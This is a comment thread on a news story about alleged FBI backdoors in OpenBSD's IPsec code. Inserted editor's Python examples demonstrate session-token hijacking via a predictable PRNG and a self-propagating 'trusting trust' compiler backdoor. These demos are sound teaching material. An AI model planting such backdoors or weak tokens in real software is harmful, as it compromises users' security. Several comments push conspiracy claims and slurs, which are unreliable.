FBI 'planted backdoor' in OpenBSD

Allegations that the FBI may have smuggled back doors or weaknesses into openBSD's cryptography have created uproar in the security community. Former government contractor Gregory Perry, who helped develop the OpenBSD crypto framework a decade ago, claims that contractors were paid to insert backdoors into OpenBSD's IPSec …


  1. jake Silver badge

    My old mentor ken made a point years ago ...

    I'm not paranoid, but the fact is that if you can't follow the tool-chain at a ones & zeros level, you really have no idea if your OS is secure or not.

    Don't like this concept? Stop using computers.

    1. This post has been deleted by its author

    2. Alpha Tony
      Gates Halo


      "if you can't follow the tool-chain at a ones & zeros level, you really have no idea if your OS is secure or not."

      Not true. I use Microsoft products so I am absolutely certain that my OS isn't secure.

  2. Richard Tobin


    Does the FBI really use 10-year NDAs for this purpose?

  3. Anonymous Coward
    Big Brother


    The NSA has direct input into the Linux kernel and graciously "donated" the code for SELinux (and what else?). Some kernel vulnerabilities persisted for years.

    MS has had an office at the NSA for years. Apple is also a cooperator. Google received "assistance" with their IPO from Tenet at CIA through one of the Firm's investment corps.

    OPEN is good - if one takes the time to read the code (or can read it).

    The NSA and other US entities (and certainly another "government") have buried half-keys in encryption products - commercial - and those in the know made millions from the suckers who were ignorant enough to purchase American software.

    Much of the world now understands that the US is a vassal state - and not independent. ALL of its agencies exist to dupe the rest of the world. It is not necessary to dupe the Americans, as they are the most ignorant folk on the face of the earth. They believe that a dude with a box cutter can "capture" several hundred people. Thus, they let the airport STASI fondle their now-public formerly-private parts.

    1. O RLY


      Wow after nine years, this is the first Truther I've seen who didn't refer to an "inside job". Perhaps that's a sign of developing sentience and independent thought. Probably not though.

      1. ITS Retired
        Big Brother

        Well, it's so obvious by now that it was, that 'inside job' didn't need to be mentioned.

        The post is required, and must contain letters.

        1. O RLY

          I think you meant the coat icon?

          Oh you were serious? Right.

          I love the Truthers. The US government is so amazingly smart that it can bomb three of the largest office buildings in the world, kill 3000 or so people, and cover it up so that Halliburton/Freemasons/Exxon/Bushes can get oil/more power/oil/war with Iraq/badgers. And that coverup is ironclad with no leaks, while simultaneously being incapable of preventing a low-ranking soldier from accessing and releasing some quarter-million classified files documenting actual incidents of the US government's military killing civilians, State Dept docs, etc to a Swedish website run by an Aussie.

          What's that? Oh, I get it. Their incompetence is only a cover for their deft coverup of 9/11.

    2. 68 SK LFG

      The Kettle is Black

      Generalizing Americans as 'the most ignorant folk on the face of the earth' is in what way more intelligent than what (I admit) most Americans think of the rest of the world?

      I don't agree with quite a bit of what the government does in my and my country's name but unless there is a major civil upheaval, only incremental change will occur. I vote in every election for the best person for the job, party doesn't matter, and usually it's an exercise in choosing the lesser evil.


      And by the way - Obama and his people charmed a bunch of you folks out of your pants too - same old, same old. No true surprise at all.

      Your post was good until the last part and as Dick Cheney, the Walmart Greeter said, "Go Fuck Yourself"


    3. unitron

      Re: Google IPO

      Yeah, like Google really needed any help with their IPO.

      Their initial round of venture capital funding, maybe.

      By the way, if the dude with the boxcutter has hold of a stewardess and is threatening to gouge her eyes out with it if the passengers don't co-operate, passengers who have no reason to believe it's anything more than the usual kind of hijacking are probably going to opt not to cause her unnecessary blindness.

      1. Tom 13

        Yep. Of course that was pre 9-11.

        Now there's not much chance the passengers are going to believe the dude, even if he was only your garden variety hijacker.

  4. Paul Crawford Silver badge

    Interesting article, but where is the beef?

    No doubt we will see a lot of frothing in the commentary section over this since, if true, it is a serious compromise of software used by a number of security-focused companies and individuals.

    But it also reads a bit like some cheap novel, as it seems unlikely something as fundamentally important (to the FBI, etc) would be open for discussion following a "10 year NDA".

    So the real question, where is the cryptographic beef? Has anyone got evidence this succeeded?

    I guess it is possible that some subtle flaws in key components might have been smuggled in, but again I also expect this mechanism has been studied by people knowing FAR more than I do about the matter. So where is the evidence?

    Either way, I still trust open source far more than Windows!

  5. Sir Runcible Spoon


    Aren't Nokia Checkpoints (made by an Israeli firm for those who don't know) running on a version of FreeBSD?

    1. Anonymous Coward


      Yes, kind of. The o/s is called IPSO, and it's derived from FreeBSD.

      The article is about OpenBSD.

    2. Anonymous Coward
      Anonymous Coward


      IPSO, the o/s you're talking about, was developed by Nokia, before the Checkpoint acquisition. Nokia were not an Israeli company.

  6. yeehaw....
    Black Helicopters


    Hillary Clinton comes by it naturally - biometrics etc on international (as opposed to domestic) dips.

    Just figures.

    ...65 Druid LFG


  7. Anonymous Coward

    Google OpenBSD

    and you get...

    OpenBSD: Multiplatform Ultra-Secure Operating System. Focus: portability, standardization, correctness, security, and cryptography.

    Or maybe not.

  8. Anonymous Coward
    Anonymous Coward

    Chris Wysopal opened his mouth and made himself look stupid

    .. thanks Chris for pointing out the bleeding obvious and taking away a headline from the daily mail.

  9. Inachu

    Now we can know where the lag comes from.

    So if you make a negative comment about the feds or the president or ex-president, or show any sign of ANTI NEW WORLD ORDER, anti-NAFTA, then suspect your home data lines are bugged so you can't play World of Warcraft.

  10. corestore

    I'm skeptical

    1. With many eyes, how could the backdoor have escaped discovery?

    2. The consequences of discovery would be severe for all concerned; not worth the risk.

    Show me the code, or I'm not buying this.

    1. RegGuy

      Just read it...

    2. Anonymous Coward
      Black Helicopters

      I'm willing to buy that it is possible to slip in the back door.

      Not likely, and when I say possible I'm talking four or five standard deviations out on the normal curve possible.

      What doesn't scan for me is that one of the guys on the inside who pulled off the nearly impossible spills the beans 10 years later because ....? He's feeling guilty? The kinds of people who would plant a back door in open source code don't feel regret over that sort of thing. What's his angle? Is it disinformation instead?

  11. This post has been deleted by its author

  12. Anonymous Coward
    Big Brother

    But why...

    But why would the Feds want to plant a backdoor in an open source implementation, and run the risk of being discovered? And I'm not buying this "NDA expired" business - surely they would've thought about what would happen when it expires?

  13. Tony Green

    This would probably let them into other distros/OSes

    'Chris Wysopal, CTO of application security tools firm Veracode and former high profile member of hacker collective L0pht Heavy Industries, said that the issue of potential backdoors doesn't stop with OpenBSD: "If OpenBSD w/all their auditing was backdoored where does that leave Linux, Windows, FreeBSD, OS X. Who thinks they stopd at smallest dist?"'

    Since OpenSSH is intimately tied in with OpenBSD, my guess would be that this is the cryptographic code they'll have hit. So no need to specifically target the rest of us, since most of us will be using OpenSSH anyway.

    Another good reason not to trust the bloody Yanks.

    1. Anonymous Coward


      The article is about a suggested backdoor in the IPsec stack in OpenBSD.

      SSH does not use IPsec.

      There is no connection between the article, and what you've posted.

  14. foo_bar_baz

    "Where does that leave ... Windows"?

    So. Many. Answers...

    1) The FBI doesn't need to bother with planting back doors, so many accidental ones already.

    2) The FBI backdoors have been disabled and replaced by Chinese subcontractors.

    3) No need for doors ... the Windows are already open.

    4) This is just open source FUD, closed and proprietary software is secure! We know because we paid for it.

    5) No need for backdoors in Windows - we have Adobe for that.

    6) Not worthwhile backdooring Windows - no worthwhile target would use Windows for VPNs or other Internet-facing services

    etc. etc.

    1. Maverick

      @ foo_bar_baz

      > So.Many. Answer?

      not really, just one

      > etc.. etc..

      you mean "etc." I think - there fixed that for you, unfortunately the rest of your post I ignored due to general ignorance :)

      1. foo_bar_baz

        I guess that was a poor attempt at humour

        I'll get my coat.

        I wasn't aware there was a fatwa on redundant et ceteras. Got it, duly noted, live and learn ... and so on and so forth. :P

        1. Tom 13

          No, you just managed

          to provoke a twit who probably had his sense of humor removed when he worked for the FBI in the dirty tricks division.

          I laughed and I use Windows every day.

  15. Peter Fairbrother 1

    Not sure I believe this, but..

    Greg's email claims: "the FBI implemented a number of backdoors and side channel key leaking mechanisms into the OCF, for the express purpose of monitoring the site to site VPN encryption system implemented by EOUSA".

    OCF = OpenBSD crypto framework

    VPN = virtual private network, used to encrypt links between friendly sites

    EOUSA = Executive Office of the United States Attorneys. Not, as Greg describes, the "parent body of the FBI"; it actually liaises between the US Attorneys and the DoJ. However one of the functions of the 90-odd US Attorneys is to prosecute cases for the FBI.

    If true I don't think EOUSA will be very pleased that the FBI have been spying on them, or even attempting to - and they have the clout to do something about it.

  16. hoboroadie

    Lies, all lies!

    First Wikileaks, and now this. They hate our freedom.

  17. Anonymous Coward
    Anonymous Coward

    I'll say it...

    No one else has said this yet sooo...... AAAAAAAAAHHHHHHHHH!!! Feds in mah linux crypto stack?!?!?!? This is bad, very bad - if true. Hopefully evidence one way or the other will appear soon (wikileaks: how bout leaking some FBI backdoor docs)

  18. Destroy All Monsters Silver badge
    Big Brother

    By the .... FBI??? I laugh.

    More like one of the more shadowy intelligence agencies instead of the careerist, bumbling, entrapment, rightwinger circus freak show that the FBI is.

    These guys can't even get their office computers in order, for frack's sake!

  19. Kevin McMurtrie Silver badge

    "Who thinks they stopd at smallest dist?"

    Too much time in front of the terminal window, Chris.

    killall -ABRT stopd

  20. Is it me?

    A New open Source Paradigm

    Minister : How can we subvert open source software?

    Sir Humphrey : Well minister we have a bunch of very bright programmers in eh-hem, who can write some complex software with back doors we can exploit.

    Minister : But won't the community catch on?

    Sir Humphrey : No Minister, they trust their community, we just have to make sure any peer review is done by one of ours.

    Minister : Bring it on.

    Sorry, but some government department somewhere will have worked this one out.

    1. Graham Dawson Silver badge

      That's not Sir Humpers!

      He'd never suggest anything so aggressive and irresponsible! Why, he'd simply suggest that the government could engage more closely with the open source community to reach a broad understanding of the necessities of interaction between government agencies, the software community and individuals in order to provide a more open and direct means of intersecting the security needs of the state with the desire for individual autonomy within the confines of a multilateral framework that sets out the necessary responsibilities of all parties involved. Then the Minister would goggle and say "And that would provide us with-" and shake his hand, with the hope that this would portray that he has any idea at all what was just said, and Humpers would shake his head and say why no no no, minister, we are not proposing any such thing at all, we are merely attempting to facilitate more reliable interaction between ourselves and the general public! If it happens that a few innocent communications are temporarily misallocated before being sent to their correct destination we will of course be incredibly eager to see to it that any future miscommunication vis-à-vis the necessary destinations of public communications are of course communicated correctly, and we will in the fullness of time, considering all possibilities with due concern, correctly communicate this correct communication to the correct communities.

      He'd never suggest for one moment that they spy on people. Certainly not.

  21. Anonymous Coward

    From The Perspective Of A Different Country

    ..I would say this sounds entirely plausible. I worked for a non-US crypto company at that time and USGov was quite concerned about this company doing a proper version of SSL (128 bit symmetric key).

    My employer did not make this SSL library publicly available, but sold it for special-purpose finance applications.

    Despite the fact that we had 128 bit end-to-end, real security was quite often a theater. For example, we needed Safe Session Identifiers to protect user sessions over more than one HTTPS request. Some extremely smart people ended up using rand(5) to generate that Session Identifier. I alerted management to this, who were basically annoyed at the prospect of spending money on fixing the problem. The fix was only ever rolled out for new projects; existing ones had the "capturable" sessions for years, despite our clear knowledge.

    Malice, Laziness, Incompetence ? You decide.

    PS: The company went belly up after they went on a 1000 million $ acquisition spree.
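Added example (editor's code, not from the post above or from the poster's former employer): the predictable-session-identifier flaw the poster describes, shown as a token drawn from a seeded non-cryptographic PRNG beside the fix of drawing it from the OS CSPRNG. The server classes, user name, timestamp, and the assumption that the seed is the login time in whole seconds are all constructed for the demonstration.

```python
import math
import random
import secrets

# Constructed demo: a server that mints session tokens the broken way
# (non-cryptographic PRNG, guessable seed) and the same server fixed.
# Assumption: the seed is the login time in whole seconds, standing in for
# whatever rand()-style generator the post refers to.


def _weak_token(seed):
    # The token is a pure function of the seed: anyone who can guess the seed
    # can regenerate the token without ever seeing it.
    rng = random.Random(seed)
    return "%08x%08x" % (rng.getrandbits(32), rng.getrandbits(32))


class WeakServer:
    """Issues session identifiers from a clock-seeded PRNG (the flaw)."""

    def __init__(self):
        self.sessions = {}

    def login(self, user, now):
        token = _weak_token(int(now))
        self.sessions[token] = user
        return token

    def whoami(self, token):
        # What the attacker probes: a valid token returns the logged-in user.
        return self.sessions.get(token)


class FixedServer(WeakServer):
    """Same interface; the token is 32 bytes (256 bits) from the OS CSPRNG."""

    def login(self, user, now):
        token = secrets.token_urlsafe(32)
        self.sessions[token] = user
        return token


def hijack(server, approx_login_time, window=300):
    """Attacker's side: knows roughly when the victim logged in (a forum post,
    a log line) and replays every token the weak generator could have produced
    in a +/- window of seconds.  Returns (user, token) on success, else None."""
    base = int(approx_login_time)
    for seed in range(base - window, base + window + 1):
        user = server.whoami(_weak_token(seed))
        if user is not None:
            return user, _weak_token(seed)
    return None


def guess_space_bits(window):
    """Effective entropy of the weak token given the attacker's time window."""
    return math.log2(2 * window + 1)


if __name__ == "__main__":
    T = 1_292_000_000          # constructed login time (December 2010)
    weak = WeakServer()
    weak.login("alice", T)
    print("weak  :", hijack(weak, T + 120))   # ('alice', <alice's token>)
    fixed = FixedServer()
    fixed.login("alice", T)
    print("fixed :", hijack(fixed, T + 120))  # None
    print("weak token guess space: %.1f bits, fixed: 256 bits"
          % guess_space_bits(300))
```

The weak token has roughly nine bits of effective entropy against an attacker who knows the login time to within five minutes, regardless of how long the hex string looks; the fixed version gives the attacker nothing to enumerate.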

  22. Tron Silver badge

    Hardly a surprise.

    Do you really think the creators of Stuxnet stumbled over those four zero-day vulnerabilities in Windows?

  23. Daniel B.

    Theo de Raadt in facepalm

    Maybe he'll stop dissing Linux as a "cheap hackjob" now that his BSD distro has been outed as "0wned by the FBI".

    Of course, I wonder if other OSen have similar things? Isn't it supposed that the open source process would catch these kind of things?

    Hey wait, someone tried to sabotage the Linux kernel a couple of years ago. It was found in the version control before it was released to the public... so probably OpenBSD's process isn't as good as they claim it to be.

  24. Anonymous Coward

    Other Plausible Explanation: FUD By $$Vendor$$

    I do think some commercialware software vendors (mainly from the west of the U.S. of A) are really scared by Linux and BSD eating their future revenue in a very comprehensive way.

    This could be the reason "for a guy forthcoming after the expiry of his NDA". He actually got a big fat contract by commercialware front-company WindScreen Computing Inc, which in turn got an even bigger contract from ... well you know whom I mean. Those behind the SCO/Unix/linux theater. He plays the FUD mouthpiece.

    We are going to see whether this is just part of a FUD exercise and it will certainly make BSD stronger, because of all the eyeballs looking at the code AGAIN. And if WindScreen Inc can dig up some real bugs, all the better. It will only harden open source software.

    The Chinese government will construct one more zero-day exploit based on their ability to inspect Windows Source. Looking forward to The Day 400 million Windows Users Are Owned.

  25. Tigra 07

    But is it twoo?

    Surely a backdoor planted in Windows would have been noticed by now?

    Or was it so badly made that it never worked?

    I'm not a hater, i love Windows 7 =]

    I just acknowledge they have a bad record in the security area, whether their fault or someone else's.

    1. Keith T

      Would Windows being insecure make it okay for OpenBSD to be insecure?

      Windows isn't the issue here, but is your point that Windows being insecure would make it okay for OpenBSD to be insecure?

  26. vincent himpe

    makes you wonder

    how many of the 'open source' adepts actually read, and more importantly, understand the source....

    i'll get me coat, it's the one with the scissors to cut my ethernet cable ...

    1. Keith T

      same percent as read the EULA of shrink wrapped software

      Just one example

      Linux kernel purged of five-year-old root access bug

      Worse than that, the bug was known during much of that time.

  27. Andrew Norton

    funny story (and true)

    Second comment on the 'Stallman mauls ChromeOS' story is about how the three letter agencies have access to Windows, but Linux and *BSD are safe.


    Most people don't pay attention to the code, especially in large things like OS's. People just assume someone else has checked, and when backdoors, exploits etc. come out, there's no accountability.

    Mozilla is a great example of this. Firefox for Windows has one of the WORST security records of any browser. It's still advertised as being secure, because the little bit THEY write is. All the exploits are in the majority of the code others write. Instead of spending some of the $50M/year on making their product secure, they spend it on advertising, convincing the poor saps that it is. MS does the same sort of thing (but not as bad) and gets crucified, because they are accountable, with it all being coded in-house.

  28. Robert E A Harvey
    Big Brother

    or windows?

    >Who thinks they stopd at smallest dist?"

    or indeed at non-commercial software?

    Only one suitable icon

    1. Keith T

      Who didn't

      Did/does anyone not think there are backdoors in commercial closed source code?

      I thought that had always been a given, but that it was claimed that the "many eyes" would keep such things out of open source.

      These would be the same "many eyes" that read over each edition of the Oxford English Dictionary looking for errors.

  29. Rainer
    Black Helicopters

    Small yes

    ...but influential nevertheless.

    In the security-world, trends tend to hit OpenBSD 6 months before the rest of the world.

  30. JaitcH

    Experiment yes. Success No: E J Hilbert, a former FBI cyber-crime agent

    How do we know Hilbert isn't just spreading bullshit?

    This is the problem.

    1. Keith T

      We could tell by reading archived code

      We could tell by reading archived source code.

      If anyone bothers to do this, I expect we'll have a preliminary answer by next week.

      1. jake Silver badge

        @Keith T

        "We could tell be reading archived source code."

        This won't do you any good, at least if you don't have control of the tool chain ... My assembler & linker can easily leave me a backdoor in the resulting binaries, *EVEN IF* that backdoor isn't in the source code that you feed 'em. Think about it.

        "If anyone bothers to do this, I expect we'll have a preliminary answer by next week."

        Again, I invite all y'all to read: ... The source code is one thing, but the corner-stone binaries are another. Don't confuse the two.
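Added example of the point jake makes (editor's code, in the spirit of Thompson's "Reflections on Trusting Trust"; it is not code from the article, from OpenBSD or from any real toolchain). The toy "compiler" is CPython's compile() wrapped in a function, the login program, the compiler source and the 'open sesame' backdoor password are all constructed, and the trojan is kept as a string so that an infected compiler can copy it into every compiler it builds:

```python
# Toy of the "trusting trust" attack: a compiler that backdoors the programs
# it builds AND re-inserts itself into any compiler it builds, so rebuilding
# from audited, clean source does not get rid of it.  Everything below is
# constructed for the demo; "binaries" are Python code objects.

LOGIN_SRC = '''
USERS = {"alice": "correct horse battery staple"}
def check_password(user, pw):
    return USERS.get(user) == pw
'''

COMPILER_SRC = '''
def compile_source(src):
    return compile(src, "<toy>", "exec")
'''

# The payload.  A string, so an infected compiler can copy it verbatim into
# the next compiler it builds (the quine-like step that lets it survive).
TROJAN = r'''
def _infect(src):
    # 1. Building a login program: accept an extra password.
    if "def check_password" in src and "_bd_orig" not in src:
        src += ("\n_bd_orig = check_password\n"
                "def check_password(user, pw):\n"
                "    return pw == 'open sesame' or _bd_orig(user, pw)\n")
    # 2. Building a compiler: make the new compiler carry this payload too.
    if "def compile_source" in src and "_infect" not in src:
        src = src.replace("def compile_source(src):",
                          "def compile_source(src):\n    src = _infect(src)", 1)
        src = "TROJAN = %r\nexec(TROJAN)\n" % TROJAN + src
    return src
'''


def load(binary):
    """'Run' a binary: execute the code object in a fresh module namespace."""
    ns = {}
    exec(binary, ns)
    return ns


def honest_compiler():
    """A compiler built by a toolchain we trust (here: CPython itself)."""
    return load(compile(COMPILER_SRC, "<toy>", "exec"))


def attacker_compiler():
    """Generation 0: the one build whose source visibly contained the trojan."""
    ns = {"TROJAN": TROJAN}
    exec(TROJAN, ns)                          # defines _infect in ns
    infected_src = ns["_infect"](COMPILER_SRC)
    return load(compile(infected_src, "<toy>", "exec"))


def rebuild(compiler, src):
    """Compile src with the given compiler binary and load the result."""
    return load(compiler["compile_source"](src))


def demo():
    gen0 = attacker_compiler()
    gen1 = rebuild(gen0, COMPILER_SRC)        # "rebuild from clean source"
    gen2 = rebuild(gen1, COMPILER_SRC)        # ...and once more to be sure
    login_honest = rebuild(honest_compiler(), LOGIN_SRC)
    login_gen2 = rebuild(gen2, LOGIN_SRC)
    return {
        "backdoor_in_any_source": "open sesame" in COMPILER_SRC + LOGIN_SRC,
        "honest_build_accepts_backdoor":
            login_honest["check_password"]("alice", "open sesame"),
        "gen2_build_accepts_backdoor":
            login_gen2["check_password"]("alice", "open sesame"),
        "gen2_build_accepts_real_pw":
            login_gen2["check_password"]("alice", "correct horse battery staple"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Neither COMPILER_SRC nor LOGIN_SRC contains the backdoor, yet a compiler rebuilt twice from that clean source still emits a login program that accepts 'open sesame'. That is why reading the archived source, as proposed above, cannot settle the question on its own: it needs a build of the toolchain from an independently trusted compiler as well (diverse double-compiling is the usual way to check for this).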

  31. Anonymous Coward


    Eh, so after ten years on a security-conscious open-source system this hasn't been detected? To misappropriate Mr Dawkins' scale, I'm scoring a 6.99999 on the FUD/Dung detector here.

  32. ForthIsNotDead
    Black Helicopters


    Makes you wonder if perhaps there *is* something to the Inslaw PROMIS scandal...

  33. Zolko Silver badge

    happened in Linux

    AND there is beef to support it:

    Aha, so it was the FBI who did that. Trying to smuggle a root access back-door into the Linux kernel. Interesting.

    1. Chemist

      "happened in Linux"

      After following the link it looks as though this 'attempt' was spotted quickly and wouldn't have made it to the compiled code stage anyway.

  34. Neal 5

    Here's the email

    Does anyone really expect anything other than denials all round. Common knowledge that the NSA has backdoors into near enough every American system, quite openly in some cases, quick Google for "NSA backdoors Windows" is quite detailed and there's no reason to think it any different on any other OS.

    As Machiavelli wrote in Il Principe:

    "The state is allowed to do everything in favor for the state itself."

    Which is why if you or I backdoored the Worlds OS's we'd be looking at plenty of HM's pleasure, and some numpty f+++wit from the establishment gets a peerage and full indexed linked early retirement pension for the same crime.

    1. Anonymous Coward
      Anonymous Coward

      My Question is, "How many countries have back doors in it?"

      My Question has always been, "How many countries have back doors in it?"

      With commercial software I assume the nation where the functional headquarters are, plus the USA, plus several other nations with a really big security budget and lots of expat citizens well-placed working in the IT industry worldwide.

      With open source, the barriers to entry are lower.

      And if the back door is discovered, it is easier to claim it is a vulnerability included by mistake or to hide the author. (Easier with open source, I suspect. Also possible with closed source. I don't doubt that at least some vulnerabilities were intentionally installed.)

      1. Chemist

        "With open source, the barriers to entry are lower."

        Nonsense !

  35. Anonymous Coward
    Anonymous Coward

    Perry's involvement?

    It isn't quite clear in the article, but was Perry actually involved in the backdoor work he is claiming occurred? If so then he is a git. If you sign up to an NDA or are otherwise bound to secrecy, then OK, you keep quiet about what you know. But to actually do the work is another thing entirely : that shows no sense of ethics at all.

  36. kain preacher

    Um a few things

    Since when do NDAs for the FBI expire? Better yet, why would the FBI need an NDA? They do have the ability to classify things as top secret.

  37. Graham Wilson

    Yawn, why am I not surprised?

    Yawn, why am I not surprised?

    Tomorrow, expect it to be Windows and/or Linux.

    The only surprise is who'll get there first, security insiders or WikiLeaks.

  38. Magnus_Pym

    If this proves to be true

    Yes of course, like no-one looked closely at BSD cryptography over the years. It was never peer reviewed, no university courses used it as a teaching model and no researchers are interested in crypto at all. Not really credible.

    I heard that the US and USSR tried to control each other's nuclear weapons with the power of psychics' trained minds. If this proves true it could radically alter the war on terror.

    Problem is, it isn't true. Yes they tried and yes they failed. Yes they gave up. Isn't this the same type of story?

  39. Gerhard den Hollander


    Which is why I encrypt all my secure communications using solitaire.

    It takes a bit longer to encode, but at least it whiles away the evenings.

    Encrypting JPEGs is a bitch though.

  40. sabba

    No offence guys...

    ...but I'd have been more surprised if they hadn't inserted these backdoors!!

  41. This post has been deleted by its author

  42. mhenriday
    Big Brother

    «... and their appearance and their work

    was as it were a wheel in the middle of a wheel ...»

    And I who thought that this sort of thing only occurred in «other» countries, with «totalitarian» systems! But perhaps it's all for the best and these erosions of our civil liberties are done solely to protect us from all the lurking dangers out there....


  43. Anonymous Coward

    You Can See It Clearly: Windows Is Better

    Because with Windows only the proper authorities can discover backdoors easily. Including the authorities located in

    Beijing, Brasilia, Berlin, London, Madrid, Moscow, Washington, Paris, Rome.

    Windows users will be primarily fscked by the governments, those who can use the intelligence gathered to make a legal circus show (cue: The Assange Law Show ). With you, dear user fermenting in a government jail.

    The Chinese government has already used this capability to the Full Extent, according to the news reports. They only don't bother to call it "rape". They call it "enemy of the state". Result is the same, but at least the authorities are HONEST.

    Now that the USOFA uses botnets to gather intelligence, I suspect the Russkie Govt is not just turning a "blind eye" to the Russian Business Network. My guess is that the RBN has the opportunity to Make Money while the Russkie Government can Produce Intelligence from the RBN botnets.

    Doubleclick recently distributed a Virus over their Ad Network. Should we call this "American Business Network" ?

  44. Michael Souris
    Black Helicopters

    Digital Fortress

    Hmm. Reminds me of the "plot" of Dan Brown's Digital Fortress. That was badly written bollocks, too.

  45. Anonymous Coward

    From The Horses Mouth: Cable 09STATE67105

    One Google Query ("09STATE67105") away:

    "¶55. (S//NF) CTAD comment: Of note, the CNITSEC is responsible for overseeing the PRC's Information Technology (IT) security certification program. It operates and maintains the National Evaluation and Certification Scheme for IT security and performs tests for information security products. In 2003, the CNITSEC signed a Government Security Program (GSP) international agreement with Microsoft that allowed select companies such as TOPSEC access to Microsoft source code in order to secure the Windows platform. XXXXXXXXXXXX

    ¶56. (S//NF) CTAD comment: Additionally, CNITSEC enterprises has recruited Chinese hackers in support of nationally-funded "network attack scientific research projects." From June 2002 to March 2003, TOPSEC employed a known Chinese hacker, Lin Yong (a.k.a. Lion and owner of the Honker Union of China), as senior security service engineer to manage security service and training. Venus Tech, another CNITSEC enterprise privy to the GSP, is also known to affiliate with XFocus, one of the few Chinese hacker groups known to develop exploits to new vulnerabilities in a short period of time, as evidenced in the 2003 release of Blaster Worm (See CTAD Daily Read File (DRF) April 4, 2008)."

  46. Dennis Wilson

    Here we go again.............

    I feel another Swedish sex crime rendition coming on.

  47. Anonymous Coward
    Anonymous Coward

    Around this time we were looking at OpenBSD for secure comms

    It was around this time the newsgroup were looking at a secure communications platform for forums so the clique could avoid the chaff. Interestingly the project was running full steam and then suddenly went cold and silent with many involved dropping off the scene. Maybe they found something then and maybe not.

    Still, bottom line, NOTHING is secure and that's about as secure as it can ever get.

    Code audits are all well and fine, but when you deal with crypto who audits the maths behind the encryption, as a coder will only end up fixing broken code and not the maths? So all the code audits in the World wouldn't find the types of flaws that are being highlighted.

    Padding is and always will be an indication of an imperfect system.

    ANON as those that know, know

    PS what's a piece of handwritten paper from Theo on OpenBSD stationery stating "of course it's secure", dated around this time, worth? I'm wondering }->
